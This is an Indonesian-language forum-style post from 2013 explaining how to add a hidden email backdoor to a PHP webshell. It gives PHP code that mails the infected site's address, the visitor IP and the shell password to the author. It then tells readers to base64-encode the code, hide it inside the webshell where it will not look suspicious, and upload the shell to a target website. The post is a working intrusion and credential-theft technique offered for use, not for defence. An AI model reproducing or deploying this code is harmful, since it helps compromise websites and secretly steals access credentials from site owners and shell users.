Wednesday 12 June 2013

Web Shell

Permisi suhu & member logodc
Pada thread pertama ini , ane pingin share cara buat backdoor email di webshell…
langsung aja ya.

Persiapan:
-webshell
-base64 encode DOWNLOAD DISINI
-email

Langkah –langkahnya:

1.copas kode dibawah ini :

$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "")
{$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$site = $_SERVER["HTTP_HOST"];
$url = $_SERVER["REQUEST_URI"];
$target = rawurldecode($site.$url);
$body = "Lapor komandan, ada mangsa di : $target | password = $code IP = $visitor"; @mail("isikan email anda","Laporan", "$body");
} else {
$visitcount;
} setcookie("visits",$visitcount);

Keterangan:

-isikan email ditempat “isikan email anda”
-untuk $code ganti sesuai dengan variabel password pada webshell

2. setelah selesai mengisi semua nya silahkan buka tools base64encode kemudian enkripsi kode tersebut kedalam base64. :

[Image: capture2.jpg]

3.setelah proses enkripsi selesai kemudian buka kodingan webshell.. lalu sisipkan kode tersebut kedalam webshell, Untuk penyisipan codenya silahkan sisipkan ditempat yang tersembunyi agar tidak mencurigakan. :

[Image: capture4.jpg]

4.setelah semua selesai , silahkan coba webshell tersebut ..untuk mencobanya silahkan upload ke website target ato webhosting gratisan.
kemudian setelah webshell terupload silahkan coba buka webshell tersebut…

[Image: capture5.jpg]

5. kalo backdoor berhasil … maka backdoor akan mengirimkan email ke inbox ato spam

[Image: capture6.jpg]
[Image: capture7.jpg]

sekian thread ane ….kalo ada kesalahan nya mohon di koreksi ya….
soalnya maklum ane juga masih newbie mohon.
ane pamit undur diri dulu ya kalem